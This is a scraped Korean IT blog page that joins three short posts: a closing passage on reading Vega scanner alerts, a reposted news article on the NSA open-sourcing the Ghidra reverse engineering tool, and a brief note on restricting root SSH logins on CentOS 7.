If Vega reports a "High" alert, don't panic. Vega's modules are sensitive and sometimes produce false positive alerts for vulnerabilities that may not actually exist. False positives aren't necessarily a bad thing. That being said, it's a good idea to comb through the report and manually investigate each alert. Think of these alerts as areas worth further investigating and not definitive indications that something needs to be fixed.

Vega does a fantastic job of explaining what each alert means, their impact on our websites, and ways to remedy the vulnerabilities. It also includes useful references that may help us better understand how to deal with the vulnerabilities.

Clicking on one of the alerts will display tons of useful information.

Vega Can Help Keep Your Website Secure

Vega is an excellent tool to help security researchers better understand web application penetration testing. Its vast selection of modules allows even novice users to dig deep into potential security risks and assess their severity to websites. Anyone interested in improving the security of their website and enhancing their web hacking skills will come to love Vega and its ease of use, or at least, I hope so.

nd its ease of use, or at least, I hope so.


블로그 이미지

remoted

Remoted's IT LAB & POST DATABASE

댓글을 달아 주세요

https://itsfoss.com/nsa-ghidra-open-source/?fbclid=IwAR1NLFPSXtUQPJfodcCc9Rjs2LjpJaWq8O9svcVaAcZ09BV7AH5N20EvBSs

Ghidra – NSA’s reverse engineering tool is now available to the public for free.

NSA cybersecurity advisor Rob Joyce announced the public release at the RSA Conference 2019 in San Francisco.

Earlier, we had reported that the National Security Agency (NSA) was going to open source Ghidra. It was spotted from the senior NSA advisor, Robert Joyce’s session description on the official RSA conference website.

Here’s what it mentioned:

Image Credits: Twitter

In case the text in the image isn’t properly visible, let me quote the description here:

NSA has developed a software reverse engineering framework known as GHIDRA, which will be demonstrated for the first time at RSAC 2019. An interactive GUI capability enables reverse engineers to leverage an integrated set of features that run on a variety of platforms including Windows, Mac OS, and Linux and supports a variety of processor instruction sets. The GHISDRA platform includes all the features expected in high-end commercial tools, with new and expanded functionality NSA uniquely developed. and will be released for free public use at RSA.

The speculations have turned to be true as Ghidra is now available for the public.

What is Ghidra?

Ghidra is a software reverse engineering framework developed by NSA that is in use by the agency for more than a decade.

Basically, a software reverse engineering tool helps to dig up the source code of a proprietary program which further gives you the ability to detect virus threats or potential bugs. You should read how reverse engineering works to know more.

The tool is is written in Java and quite a few people compared it to high-end commercial reverse engineering tools available like IDA.

Reddit thread involves more detailed discussion where you will find some ex-employees giving good amount of details before the availability of the tool.

NSA open source

Ghidra was a secret tool, how do we know about it?

The existence of the tool was uncovered in a series of leaks by WikiLeaks as part of Vault 7 documents of CIA.

Ghidra is open source

Yes, Ghidra is completely open source. It is using the open source license Apache version 2.0.

The source code of Ghidra is available on GitHub. You can browse the source code on its GitHub repository.

NSA is definitely targeting the open source community to help improve their tool while also reducing their effort to maintain this tool. This way the tool can remain free and the open source community can help improve GHIDRA as well.

If you want to contribute to the project, please read the guideline.

How to get Ghidra

Ghidra is a Java-based application and is available for Linux, Windows and macOS.

You can download it for free from its official website. It’s around 270MB in size.

There is no installation method for Gidhra. It’s simply an executable so all you need to do is to extract the downloaded file and run it.

Since it is a Java application, make sure to install Java on Ubuntu or any other Linux distribution you are using.

Wrapping Up

NSA has a few good open source project under its name. Not all of them garner praise though thanks to the not-so-good reputation of the security agency. Recently, the inclusion of NSA’s Speck encryption algorithm in Linux kernel created a huge controversy. It was removed from the kernel in the subsequent release.

A free and open source Ghidra would definitely help a lot of researchers and students and on the other side – the competitors will be forced to adjust their pricing.

What are your thoughts about it? Is it a good thing? What do you think about the tool going open source? Let us know what you think in the comments below.


블로그 이미지

remoted

Remoted's IT LAB & POST DATABASE

댓글을 달아 주세요

[CentOS 7]
/etc/ssh/sshd_config

PermitRootLogin no


설정을 수행

특정 IP 나 네트워크 대역에서 들어오는 ssh 접근 제어는 

tcp wrapper를 이용하면 쉽게 가능하다. 

특정 서버나 IP 에서만 접근하는 root 접속을 허용하고, 나머지는 차단하고 
싶을때는  아래와 같은 설정으로 구현 가능하다. 

/etc/ssh/sshd_config 

AllowUsers root@<접근호스트네임 혹은 IP> root@<접근호스트네임 혹은 IP>
위와 같이 설정하고 sshd 데몬을 restart 하면 해당 IP 에서만 root 접속이 가능하다.


service sshd restart


블로그 이미지

remoted

Remoted's IT LAB & POST DATABASE

댓글을 달아 주세요